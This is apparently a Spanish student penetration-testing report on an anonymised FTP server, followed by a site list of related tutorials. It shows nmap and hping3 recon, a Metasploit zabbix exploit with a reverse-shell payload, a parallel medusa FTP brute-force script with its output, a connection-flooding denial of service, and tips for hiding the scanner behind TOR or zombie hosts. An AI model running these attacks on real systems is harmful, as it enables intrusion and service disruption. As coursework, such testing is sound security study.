Escaneo de servidor FTP Búsqueda de vulnerabilidades

Tamaño: px
Comenzar la demostración a partir de la página:

Download "Escaneo de servidor FTP Búsqueda de vulnerabilidades"

Transcripción

1 Escaneo de servidor FTP Búsqueda de vulnerabilidades David Núñez Álvarez PSI 2011/2012

2 Con motivo de no revelar los datos del servidor al que se le realizó el estudio vamos a suponer que su dominio es ftp.objetivo.com y su IP no será completamente visible. En un principio, sólo conocemos el dominio web del servidor FTP que será nuestro objetivo de estudio, ftp.objetivo.com Nos conectamos al él desde el navegador y vemos que el servicio de FTP esta activo y funcionando correctamente.

3 1.Inicio Lo primero que haremos será conseguir su dirección IP: $nslookup ftp.objetivo.com Name: ftp.objetivo.com Address: Esta IP será la base de todas nuestras pruebas. 1.1)Empezaremos intentando hacer un ping al objetivo. $ ping c PING (1... 6) 56(84) bytes of data ping statistics 3 packets transmitted, 0 received, 100% packet loss, time 2009ms Se ve que el objetivo no responde al ping, esto puede deberse a diferentes motivos, como sabemos que la máquina está funcionando el más común es que tengan desactivada la respuesta a los mensajes ICMP. 1.2)Intentaremos llegar a él a través de otros medios como traceroute para hacernos una idea de qué máquinas hay entre nosotros y el objetivo a ver si descubrimos algo, lo mas seguro es que también se nos filtre antes de llegar al objetivo ya que traceroute funciona sobre ICMP. $traceroute Con la salida que nos dio traceroute vemos que a partir de un punto las direcciones IP se nos ocultan, cosa que nos indica que seguramente estemos pasando a través de un firewall que nos está filtrando la paquetería enviada.

4 1.3)No hay que preocuparse, hay diferentes maneras de llegar a una máquina detrás de un firewall. Una de ellas es con la herramienta hping3. Usaremos la opción t 1 combinada con la opción Z lo que nos permite que al pulsar CTRL+Z el TTL de los paquetes que envía hping3 aumente en 1 y vaya variando el punto que nos responde entre nosotros y el objetivo. Se usará también la opción S que pondrá el flag SYN de TCP a 1, flag que los firewall suelen dejar pasar ya que es el flag que permite iniciar una conexión TCP. #hping3-s-t1-p21-n-z HPING1... 6(wlan ):Sset,40headers+0databytes TTL0duringtransitfromip= :TTL0duringtransitfromip= :TTL0duringtransitfromip= :TTL0duringtransitfromip= :TTL0duringtransitfromip= :TTL0duringtransitfromip= :TTL0duringtransitfromip= :TTL0duringtransitfromip= :TTL0duringtransitfromip= :TTL0duringtransitfromip= :TTL0duringtransitfromip= :len=44ip=1... 6ttl=116DFid=14741sport=21flags=SAseq=27win=8192rtt=58.3ms len=44ip=1... 6ttl=116DFid=14742sport=21flags=SAseq=28win=8192rtt=59.4ms len=44ip=1... 6ttl=116DFid=14743sport=21flags=SAseq=29win=8192rtt=58.6ms Hemos tenido suerte, conseguimos pasar a través del firewall y alcanzar nuestro objetivo. Con esto descubrimos la IP del firewall y los saltos que hay entre este y la máquina objetivo. En un principio nuestro objetivo para este report es la IP donde se encuentra el servidor FTP, pero con la salida anterior hemos descubierto dónde está el firewall, otra posible máquina vulnerable de la red interna.

5 2)Descubrimiento Continuaremos el análisis intentando descubrir los servicios que tiene nuestra máquina objetivo (se sabe que ya tiene un servidor FTP corriendo en el puerto 21). Usaremos la herramienta nmap. Una buena práctica en un escaneo real sería utilizar opciones de nmap que nos permitan ocultarnos detrás de máquinas zombies como técnicas de idle scan. O usar herramientas como torsocks que nos permitirían meter las pruebas de escaneo por la red TOR y salir a través de una IP diferente a la nuestra. ocultando así quién está escaneando la máquina. Empezaremos con un escaneo a tres puertos conocidos que podrían estar abiertos y con la opción PN que desactiva el "nmap discovering (usando PING) ya que ya sabemos que la máquina existe y está funcionando. # nmap -st -PN -p 21,22,80 -v Starting Nmap 5.00 ( ) at :25 CE NSE: Loaded 0 scripts for scanning. Initiating Connect Scan at 23:25 Scanning [3 ports] Completed Connect Scan at 23:25, 0.76s elapsed (3 total ports Host is up (0.78s latency). Interesting ports on : PORT STATE SERVICE 21/tcp open ftp 22/tcp filtered ssh 80/tcp filtered http Read data files from: /usr/share/nmap Nmap done: 1 IP address (1 host up) scanned in 1.79 seconds Comprobamos que efectivamente el puerto 21 tiene corriendo ftp detrás, los demás puertos vemos que nmap nos indica que están filtrados. Haremos ahora un escaneo un poco más completo usando directamente el escaneo de nmap sin indicarle puertos, lo que hará que nmap haga un escaneo de los puertos más comúnmente usados (más de 1500).

6 #nmap-st-pn-v StartingNmap5.00( NSE:Loaded0scriptsforscanning. InitiatingParallelDNSresolutionof1host.at00:06 CompletedParallelDNSresolutionof1host.at00:06,0.04selapsed InitiatingConnectScanat00:06 Scanning1... 6[1000ports] Host1... 6isup(0.059slatency). Interestingportson1... 6: Notshown:913filteredports PORT STATESERVICE 21/tcp open ftp 24/tcp open priv-mail 80/tcp open http 212/tcp open anet 311/tcp open asip-webadmin 406/tcp open imsp 465/tcp open smtps 667/tcp open unknown 668/tcp open unknown 8443/tcp open https-alt 8873/tcp open unknown 9001/tcp open tor-orport 9009/tcp open unknown 9290/tcp open unknown 10215/tcpopen unknown 10629/tcpopen unknown 13782/tcpopen netbackup 17988/tcpopen unknown 20005/tcpopen btx 30951/tcpopen unknown 32781/tcpopen unknown 33354/tcpopen unknown 40193/tcpopen unknown 44443/tcpopen coldfusion-auth 49155/tcpopen unknown 49999/tcpopen unknown 55600/tcpopen unknown 58080/tcpopen unknown Readdatafilesfrom:/usr/share/nmap Nmapdone:1IPaddress(1hostup)scannedin42.43seconds Vemos que nos indica muchos puertos abiertos, cosa que es un poco extraña, ya que normalmente una máquina no suele tener tantos puertos escuchando, además nos muestra que el puerto 80 está abierto, puerto que anteriormente apareció como filtrado.

7 Esto hace sospechar y haciendo otro escaneo igual que el anterior los puertos que nos indica abiertos son otros completamente distintos. Diferentes sistemas de protección intentan engañar a los intrusos de múltiples maneras. Una de ellas es dando información falsa. Se ve que haciendo escaneos pequeños la información que se nos devuelve acerca de los puertos parece ser correcta. $nmap -st -PN -v -p PORT STATE SERVICE 21/tcp open ftp $nmap -st -PN -v -p PORT STATE SERVICE 80/tcp filtered http Así que intentaremos hacer escaneos más pequeños (y más separados en el tiempo). Se intentará buscar por tanto hacer un escaneo por lo menos a los puertos que forman el conjunto de puertos conocidos y registrados ya que son los más comunes para usar. Sería método muy tedioso (además de largo, ya que cada escaneo tarda unos 2 segundos) intentar hacer escaneos de puerto en puerto manualmente. Creamos un script que ejecute nmap 500 veces, y que empiece en el número que se le indique multiplicado por 500. Así si se le indica 0 escaneará los 500 primeros, 1 del 501 al 1000, 2 del 1001 al 1500 y así sucesivamente. ***************************************************************************************** * nmap.sh * ***************************************************************************************** #!/bin/bash ini=$[1+$1*500]; fin=$[500+$1*500]; for (( i = $ini; i < $fin; i++ )); do nmap -st -PN -v -p $i grep open done *****************************************************************************************

8 Ejecutaremos el script dentro de un bucle for desde el 1 al 100 en paralelo para poder abarcar todos los puertos anteriormente mencionados. Si se tiene un ordenador potente esto no será un problema y tendremos 100 nmap ejecutándose en paralelo cada uno interrogando a un puerto diferente de la máquina. y en pocos minutos obtenemos la salida. $ for (( i = 0; i < 100; i++ )); do./nmap.sh $i & done 21/tcp open ftp 10050/tcp open unknown 49155/tcp open unknown La ejecución funcionó y obtuvimos que la máquina tenía 3 puertos abiertos. 21 (ftp) (desconocido) (desconocido)

9 3)Reconocimiento de aplicaciones. Ya se sabe que puertos tiene la máquina escuchando. Ahora el siguiente paso será saber qué corre detrás de cada puerto. 3.1)Nmap también tiene opciones para "SERVICE AND VERSION DETECTION". Se usa añadiendo la opción sv. Ejecutando diferentes pruebas para los dos puertos nuevos que obtuvimos. $ nmap -PN -sv -p Starting Nmap 5.00 ( ) at :12 CEST Interesting ports on : PORT STATE SERVICE VERSION 49155/tcp open msrpc Microsoft Windows RPC Service Info: OS: Windows Service detection performed. Please report any incorrect results at Nmap done: 1 IP address (1 host up) scanned in seconds $ nmap -PN -sv -p Starting Nmap 5.00 ( ) at :13 CEST Interesting ports on : PORT STATE SERVICE VERSION 10050/tcp open tcpwrapped Service detection performed. Please report any incorrect results at Nmap done: 1 IP address (1 host up) scanned in 0.35 seconds Nos indica que en el está corriendo el servicio MS RPC y en el nos indica tcpwrapped (nmap no pudo descubrir que hay en ese puerto e indica que esta filtrado "tcpwrapped") Cuando nmap no puede obtener lo que corre detrás de un puerto o su versión, tiene diferentes opciones para intentar probar de otras maneras, una de ellas es " version intensity X" donde X es un número entre el 0 y el 9. En este caso se probaron con todas las opciones y ninguna dio más datos ni de versión ni de qué servicios son. (Tampoco para el puerto 21)

10 3.2)Hacemos uso de la herramienta netcat para conectarnos a los puertos intentando buscar algún mensaje de bienvenida en alguno de ellos que nos de alguna información a mayores. $nc -v -n (UNKNOWN) [1... 6] 21 (ftp) open 220-Bienvenido al FTP (over ssl) de. 220 Welcome to the FTP server. $ nc -v -n (UNKNOWN) [1... 6] (zabbix-agent) open $ nc -v -n (UNKNOWN) [1... 6] (?) open Con los mensajes de bienvenida no se consiguió nada pero vemos que netcat asocia al puerto la herramienta de monitorización zabbix. 3.3)Otra prueba podría ser buscar en la paquetería que se genera en la conexión al servicio del puerto con alguna herramienta como wireshark. Wireshark asocia también dicho puerto a zabbix. 4)Reconocimiento de SO Nmap también tiene opciones para reconocimiento de sistemas operativos e indicarnos qué sistema operativo hay detrás de una IP. Esto sería usando la opción " O" pero en este caso la herramienta no pudo indicar un sistema operativo concreto mostrando un porcentaje de más del 90 para diferentes sistemas operativos completamente diferentes. Pero también para este caso tenemos grandes posibilidades sabiendo que corre un MS RPC de que la máquina sea Windows(eso sí, no sabemos qué windows).

11 5)Análisis y explotación de vulnerabilidades. Llegados a este punto tenemos que la máquina corre detrás de un firewall Seguramente tenga un sistema de protección que engaña a nuestra herramienta de reconocimiento de aplicaciones y sistemas operativos. La máquina tiene 3 puertos abiertos y detrás de ellos un servidor ftp, el servicio de monitorización zabbix y Microsoft Windows RPC (lo que nos indica que casi seguramente sea una máquina windows). A partir de esto se podrían intentar explotar las vulnerabilidades de la máquina si es que las tiene. Hay herramientas de búsqueda de vulnerabilidades como nessus o páginas en las que se exponen vulnerabilidades y exploits para ellas db.com/. También hay diferentes herramientas online como en las que se busca por ip, dominio( Y se obtiene los servicios que corren detrás. Shodan también puede buscar por servicio y ofrecerte exploits para él. 5.1)Una herramienta para la explotación de vulnerabilidades sería metasploit. Metasploit Framework es una incluye gran cantidad de exploits para vulnerabilidades de diversas aplicaciones y las explota remotamente. Se pueden buscar las vulnerabilidades de las aplicaciones objetivo desde la herramienta o en el buscador propio de la página web del proyecto La forma básica de funcionamiento es cargar el exploit que se quiera, configurarlo y lanzarlo, si la máquina es vulnerable a dicho exploit, con pocos clicks se puede conseguir echarla abajo, tomar el control a través de un shell remoto...

12 Ejemplo de cómo se usaría el exploit para zabbix en metasploit: $ msfconsole ## ### ## ## ## ## #### ###### #### ##### ##### ## #### ###### ####### ## ## ## ## ## ## ## ## ## ## ### ## ####### ###### ## ##### #### ## ## ## ## ## ## ## ## # ## ## ## ## ## ## ##### ## ## ## ## ## ## ## #### ### ##### ##### ## #### #### #### ### ## msf > use exploit/unix/misc/zabbix_agent_exec msf exploit(zabbix_agent_exec) > show payloads msf exploit(zabbix_agent_exec) > set PAYLOAD generic/shell_reverse_tcp msf exploit(zabbix_agent_exec) > set LHOST [MY IP ADDRESS] msf exploit(zabbix_agent_exec) > set RHOST [TARGET IP] msf exploit(zabbix_agent_exec) > exploit Después de ver cómo se usa metasploit vamos a buscar exploits que puedan valernos para zabbix o MS RPC. zabbix: Sólo tienen este exploit que afecta a la version de FreeBSD (Ya que la máquina tiene Windows, descartado) Microsoft Windows RPC: La mayoría son exploits para diferentes buffer overflow que tenía en diferentes versiones. PARA (Windows NT SP3 6a/2000/XP/2003 Universal) me PARA (0 Automatic (2000 SP0 SP4, 2003 SP0, 2003 SP1 SP2) (default)

13 1 Windows 2000 Server SP0 SP4+ English 2 Windows 2000 Server SP0 SP4+ Italian 3 Windows 2000 Server SP0 SP4+ French 4 Windows 2003 Server SP0 English 5 Windows 2003 Server SP0 French 6 Windows 2003 Server SP1 SP2 English 7 Windows 2003 Server SP1 SP2 French 8 Windows 2003 Server SP1 SP2 Spanish 9 Windows 2003 Server SP1 SP2 Italian 10 Windows 2003 Server SP1 SP2 German) Ningún exploit llegó a cuajar en la máquina objetivo, si la máquina está bien parcheada y actualizada, la mayoría de los agujeros que pudiese haber en ella, están cerrados. Por esta parte no se pudo obtener nada.

14 6)Análisis y explotación de vulnerabilidades. (PASSWORD GUESSING FTP) Por otra parte sigue estando el servidor ftp. En él tenemos acceso a algunas carpetas como usuario anónimo, pero hay otras a las que sólo pueden acceder usuarios registrados. Algo que se podría intentar es el acceso a dichos directorios, para ello intentaremos loguearnos como usuario con herramientas de password guessing. Este es un proceso largo y bastante complicado, ya que la mayoría de las herramientas prueban passwords por fuerza bruta, nos facilitaría algo el trabajo saber de qué está formada la contraseña, cuantos caracteres tiene... También haría el trabajo mucho más sencillo el tener ya el nombre de algún usuario del sistema. Nosotros sabemos que los nombres de usuario para el servidor ftp son sus direcciones de correo. 6.1)Hay muchas maneras de conseguir un login de un usuario, pero si además sabemos que es la dirección de correo, un script llamado "theharvester.py" nos puede ser muy útil. security.com/theharvester.php Este script nos dará s, nombres de usuario, subdominios y nombres de host buscando en google, bing... De la organización que le indiquemos. Un ejemplo para una compañía como telefónica sería el siguiente: La salida está acortada y los s modificados, pero se puede ver como funcionaría dicho script. $pythontheharvester.py-dtelefonica.com-l200-ball ************************************* *TheHarvesterVer.2.2 * *CodedbyChristianMartorella * *Edge-SecurityResearch * *cmartorella@edge-security.com * ************************************* Fullharvest.. [-]SearchinginGoogle.. Searching0results... Searching100results... Searching200results... [-]SearchinginPGPKeyserver.. [-]SearchinginBing.. Searching100results... Searching200results... [-]SearchinginExalead..

15 Searching100results... Searching200results... [+] sfound: demo.telefonica.com [+]Hostsfoundinsearchengines: : :mailus.telefonica.com :mailar.telefonica.com : :live.us.telefonica.com : :us.telefonica.com :saladeprensa.telefonica.com : : [+]Virtualhosts: ================== cesaralierta.telefonica.com juliolinares.telefonica.com maxconn.arancharuiz.com redpacientes.com atlas.telefonica.com informerc.telefonica.com

16 Teniendo un usuario del sistema intentaríamos obtener la contraseña de este usuario por "fuerza bruta" En este caso de ejemplo vamos a usar un fichero con las contraseñas más usadas en internet el usuario "Admin" y el programa medusa. Medusa se usa de la siguiente manera: $medusa-h"ip"-u"nombreusuario"-p"archivodecontraseñas.txt"-mftp-v6 M ftp > indica que use el módulo para servidores ftp v6 > modo verbose Las pruebas de password guessing a servicios web son muy lentas ya que hay que enviar la petición y esperar la respuesta. Una forma de hacer esto un poco más rápido es ejecutar varias consultas en paralelo. Para esto se creó un pequeño script que partiese el fichero de contraseñas en N partes y que ejecute medusa N veces en paralelo cada una usando una parte del archivo partido. ******************************************************************************* ataque.sh ******************************************************************************* #!/bin/bash if [[ $#!= 4 ]]; then echo "./script <nproc> <ficheropass> <host> <usuario>" echo "nproc= numero procesos a ejecutar en paralelo" echo "host = host a atacar con medusa" echo "usuario = usuario a probar con medusa" exit; fi nproc=$1; entrada=$2; host=$3; usuario=$4; #tamano de entrada a traves de wc cogiendo solo numero lineas tam_entrada=`wc -l $entrada cut -f 1 -d " "`; #division entera hacia arriba limite=$[ ($tam_entrada / $nproc) + ($tam_entrada % $nproc) ] i=0; j=0; h=0;

17 echo -n " Dividiendo archivo de passwd " #partimos el archivo en tantos archivos como procesos se indique while read line do if [[ $i -lt $limite ]]; then echo "$line" >> salida$j.txt; i=$[$i + 1]; else j=$[$j + 1]; i=0; fi done < $2 echo "[COMPLETADO]" #se ejecuta en paralelo nproc medusa #uno con cada archivo de passwords for (( k = 0 ; k <= $j ; k++ )) do medusa -h $3 -u $4 -P salida$k.txt -M ftp -v6 & done #borrar archivos auxiliares #rm salida*; ******************************************************************************* Un ejemplo de uso del script con 5 ejecuciones paralelas sería: (./ataque NUMEROPROCESOS FICHEROPASSWORDS.txt IP NOMBREUSUARIO): $./ataque.sh5passwords2.txt1... 6admin Dividiendoarchivodepasswd[COMPLETADO] $Medusav2.0[ GENERAL:ParallelHosts:1ParallelLogins:1 GENERAL:TotalHosts:1 GENERAL:TotalUsers:1 GENERAL:TotalPasswords:200 Medusav2.0[ GENERAL:ParallelHosts:1ParallelLogins:1 GENERAL:TotalHosts:1 GENERAL:TotalUsers:1 GENERAL:TotalPasswords:196 Medusav2.0[ GENERAL:ParallelHosts:1ParallelLogins:1 GENERAL:TotalHosts:1

18 GENERAL:TotalUsers:1 GENERAL:ParallelHosts:1ParallelLogins:1 GENERAL:TotalHosts:1 GENERAL:TotalUsers:1 GENERAL:TotalPasswords:200 GENERAL:TotalPasswords:200 GENERAL:ParallelHosts:1ParallelLogins:1 GENERAL:TotalHosts:1 GENERAL:TotalUsers:1 GENERAL:TotalPasswords:200 ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:superman1(1of200complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:justus(1of196complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:unreal(1of200complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:niklas(1of200complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:123456(1of200complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:bullshit(2of200complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:area51(2of200complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:rasmus(2of200complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:ibanez(2of196complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:password(2of200complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:131313(3of200complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:deadman(3of196complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password: (3of200complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:helistin(3of200complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:terror(3of200complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:fucker(4of200complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:redbull(4of196complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:qwerty(4of200complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:blizzard(4of200complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:reaper(4of200complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:martin(5of200complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:jaguar(5of196complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password: (5of200complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:donald(5of200complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:undertaker(5of200complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:9452(6of196complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password: (6of200complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:111111(6of200complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:juventus(6of200complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:kawasaki(6of200complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:parker(7of196complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:jackass(7of200complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:abc123(7of200complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password:vincent(7of200complete) ACCOUNTCHECK:[ftp]Host:1... 6(1of1,0complete)User:admin(1of1,0complete)Password: (7of200complete)... Según la potencia(número de máquinas, potencia de cada máquina, velocidad de la conexión...) que tenga el atacante podría realizar este ataque en horas, dias, meses... Y una razón básica para poder realizar esto es que este servidor ftp no corta a quienes hagan muchos intentos fallidos de acceso o a IPs que intentan conexiones simultáneas. Una acción muy común es usar para todos los servicios internos la misma contraseña, si con este método se llegase a sacar la contraseña de algún usuario, muy probablemente podríamos acceder no sólo al servidor ftp como él, si no a otros servicios de la organización...

19 6)Análisis y explotación de vulnerabilidades. (FLOOD FTP) Como se pudo observar en el apartado anterior el servidor ftp no tiene límite de conexiones para una misma IP, ni bloquea IPs que hagan muchos intentos fallidos de conexión. Esto también podría servir para realizar ataques de denegación de servicio, en un servidor ftp sin tirar abajo dicho servidor un ataque de denegación de servicio podría ser el obtener todas las conexiones que permita establecer el servidor, impidiendo que los demás usuarios puedan conectarse. Se creó un programa en C, floodftp, ( )que establece conexiones anónimas contra un servidor ftp y no las cierra. El programa se ejecutaría: $./floodftp Elprogramaquedaejecutándose,leyendonúmeroseintentandohaceresenúmerodeconexiones contraelservidorftp. Haciendo diversas pruebas en el servidor y a la vez mostrando las conexiones establecidas entre nuestra máquina y el servidor: $watch-n1 'netstat-tupen grepfloodftp grepestablished wc-l' Se comprueba que el servidor permite establecer un máximo de 500 conexiones. Si se establece una conexión el servidor no la cierra. Pero estableciendo las 500 máximas a los 35 segundos el servidor cierra todas. A partir de lo observado en las pruebas hechas con floodftp se llega a la conclusión de que estableciendo cada 35 segundos las 500 conexiones sería muy complicado a los demás usuarios acceder al servidor debido a la denegación del servicio que estamos creando.

20 Finalmente se llega a la conclusión de que el servidor es bastante seguro, está lo suficientemente parcheado o actualizado para que no tenga vulnerabilidades en las aplicaciones que tiene corriendo. Centrándonos en la aplicación propia del servidor ftp del puerto 21, ésta permite múltiples conexiones de una misma IP y múltiples intentos de inicio sesión fallidos. Las múltiples conexiones desde una misma IP nos permiten poder obtener a un mismo usuario todas las conexiones impidiendo a los demás conectarse. Pero si se corta esto se impediría que por ejemplo en lugares en los que un conjunto de máquinas salen a través de la misma IP, como puede ser la facultad, nos pudiésemos conectar simultáneamente a este servidor de internet. La parte de que el servidor no límite el número de intentos de logearse podría considerarse un fallo de seguridad, pero si las contraseñas son lo suficientemente seguras, sería casi imposible con herramientas de password guessing remoto obtener una contraseña.

Apartado: Brutalix Versión: 3 Título: Monitorización redes. nmap Fecha: 15/06/07

Apartado: Brutalix Versión: 3 Título: Monitorización redes. nmap Fecha: 15/06/07 *PRÓPOSITO. Conocer como monitorizar una red con el programa Nmap. *CONDICIONES INICIALES. Ordenador con capacidad de arranque desde CDROM. *MATERIAL ASOCIADO. Disponer del live-cd 1 de la distribución

Más detalles

NMAP. Fundamentos de Auditoria: Software de Auditoria Seguridad informática

NMAP. Fundamentos de Auditoria: Software de Auditoria Seguridad informática NMAP Nmap se define como una suite de herramientas de descubrimiento de redes de código abierto, ha sido utilizada desde hace mucho tiempo en procesos de auditorías de seguridad ya que la misma permite

Más detalles

Instalar MBSA y GFI Languard en Windows Server 2008 y hacer un análisis.

Instalar MBSA y GFI Languard en Windows Server 2008 y hacer un análisis. Actividad 4. Instalar MBSA y GFI Languard en Windows Server 2008 y hacer un análisis. MBSA: instalamos Microsoft Baseline Security Analyzer (es gratis), y pulsamos en la opción Scan a computer. GFI Languard:

Más detalles

RETO FORENSE EPISODIO III Resumen Ejecutivo

RETO FORENSE EPISODIO III Resumen Ejecutivo RETO FORENSE EPISODIO III Resumen Ejecutivo José Antonio Valero Sánchez javalero@gmail.com Zaragoza, España 2006 Motivos de la intrusión. Después de analizar la imagen del sistema cabe destacar que el

Más detalles

Solución al Primer Reto

Solución al Primer Reto En el reto que se planteaba en el primer articulo se pedía conseguir toda la información posible sobre la maquina virtual que se suministra y a través de dicha información descubrir vulnerabilidades e

Más detalles

Ataque a servidores DNS

Ataque a servidores DNS Ataque a servidores DNS A continuación se procede a exponer los principales ataques a servidores DNS con algún que otro caso práctico. Para realizar las pruebas se ha utilizado la suite de herramientas

Más detalles

HERRAMIENTA PARA EL MAPEO DE LA RED

HERRAMIENTA PARA EL MAPEO DE LA RED HERRAMIENTA PARA EL MAPEO DE LA RED Network mapper >nmap TITULO: NETWORK MAPPING FROM LINUX OS (PARTE 1) AUTOR: Luis Miguel Castañeda Ibañez ESTUDIANTE DE LA FACULTAD #2, 4TO AÑO Network Mapper, más conocida

Más detalles

Cómo instalar fácilmente tu WordPress tras contratar un hosting en Hostalia

Cómo instalar fácilmente tu WordPress tras contratar un hosting en Hostalia Cómo instalar fácilmente tu WordPress tras contratar un hosting en Hostalia Cardenal Gardoki, 1 48008 BILBAO (Vizcaya) Teléfono: 902 012 199 www.hostalia.com La puesta en marcha de WordPress es muy sencilla,

Más detalles

Activación de un Escritorio Remoto

Activación de un Escritorio Remoto Activación de un Escritorio Remoto La activación de un Escritorio Remoto se realiza en dos fases, en la primera se habilita a un Usuario de un ordenador para que pueda admitir una conexión remota, la segunda

Más detalles

Guía de Instalación para clientes de WebAdmin

Guía de Instalación para clientes de WebAdmin Panda Managed Office Protection Guía de Instalación para clientes de WebAdmin Tabla de contenidos 1. Introducción... 4 2. Instalación de Panda Managed Office Protection a partir de una instalación de Panda

Más detalles

AGREGAR UN EQUIPO A UNA RED Y COMPARTIR ARCHIVOS CON WINDOWS 7

AGREGAR UN EQUIPO A UNA RED Y COMPARTIR ARCHIVOS CON WINDOWS 7 Tutoriales de ayuda e información para todos los niveles AGREGAR UN EQUIPO A UNA RED Y COMPARTIR ARCHIVOS CON WINDOWS 7 Como agregar a una red existente un equipo con Windows 7 y compartir sus archivos

Más detalles

INSTITUTO TECNOLÓGICO DE LAS AMÉRICA ITLA

INSTITUTO TECNOLÓGICO DE LAS AMÉRICA ITLA INSTITUTO TECNOLÓGICO DE LAS AMÉRICA ITLA How to de como habilitar el servicio de SSH en slackware. Carlos Juan Shephard G 2013-610 Sistema Operativo III Instructor: José Doñe OpenSSH es una versión LIBRE

Más detalles

Mini Guía para usar las Keops en el ITAM

Mini Guía para usar las Keops en el ITAM Mini Guía para usar las Keops en el ITAM Adrián Puente Z. Sala de Servidores Instituto Tecnológico Autónomo de México 7 de abril de 2005 1 1. Introducción. Cómo alumno de la materia de Sistemas Operativos

Más detalles

Ficheros de configuración de Nagios (ejemplo con nrpe y snmp)

Ficheros de configuración de Nagios (ejemplo con nrpe y snmp) How-to sobre Nagios Realizado por Eugenio Fuentefría Oróns Índice. Qué es Nagios? Funcionalidades de Nagios Equipos usados para las pruebas Instalación de Nagios. Uso de Nagios Modos de extraer información

Más detalles

IPSec con Windows 2003 y Windows XP

IPSec con Windows 2003 y Windows XP 1 de 13 01/12/2007 1:28 IPSec con Windows 2003 y Windows XP IPSec, IPSec es un protocolo de encriptación de tráfico de red. En este procedimiento hago una prueba de cómo encriptar las comunicaciones entre

Más detalles

..::[Manual Basico Metasploit]::..

..::[Manual Basico Metasploit]::.. ..::[Manual Basico Metasploit]::.. Creador TheJez 1) Conceptos Basicos 2) Modalidades 3) Comienzos 4) Exploits 5) Actualizar 1. Conceptos Basicos. Para empezar a hablar del metasploit, lo definiremos como

Más detalles

QUÉ ES UN SERVIDOR Y CUÁLES SON LOS PRINCIPALES TIPOS DE SERVIDORES? (PROXY, DNS, WEB, FTP, SMTP, ETC.) (DV00408A)

QUÉ ES UN SERVIDOR Y CUÁLES SON LOS PRINCIPALES TIPOS DE SERVIDORES? (PROXY, DNS, WEB, FTP, SMTP, ETC.) (DV00408A) APRENDERAPROGRAMAR.COM QUÉ ES UN SERVIDOR Y CUÁLES SON LOS PRINCIPALES TIPOS DE SERVIDORES? (PROXY, DNS, WEB, FTP, SMTP, ETC.) (DV00408A) Sección: Divulgación Categoría: Herramientas Informáticas Fecha

Más detalles

Terminal Services Configuration - TS Manager - Remote Desktops - TS Session Broker, RDP-Tcp Propierties,

Terminal Services Configuration - TS Manager - Remote Desktops - TS Session Broker, RDP-Tcp Propierties, 1 de 15 01/12/2007 1:42 Configuración de Servicios de Terminal Server - Administrador de Terminal Services - Escritorios Remotos - Agente de sesiones de TS - Propiedades de RDP Terminal Services Configuration

Más detalles

Unidad Didáctica 12. La publicación

Unidad Didáctica 12. La publicación Unidad Didáctica 12 La publicación Contenido 1. Desarrollar y explotar 2. Definición del Sitio 3. Alojar nuestra primera página Web 4. Configurar la conexión FTP U.D. 12 La publicación 1. Desarrollar y

Más detalles

TUTORIAL PARA CREAR UN SERVIDOR FTP

TUTORIAL PARA CREAR UN SERVIDOR FTP TUTORIAL PARA CREAR UN SERVIDOR FTP A continuación ustedes podrán observar y luego implementar el informe que elaboré a fin de que TODOS puedan aprender a montar y mantener su propio Servidor FTP. Comenzaremos

Más detalles

1/ XAMPP: más fácil imposible. Vamos directamente a la página de descarga de Apache Friends para Windows

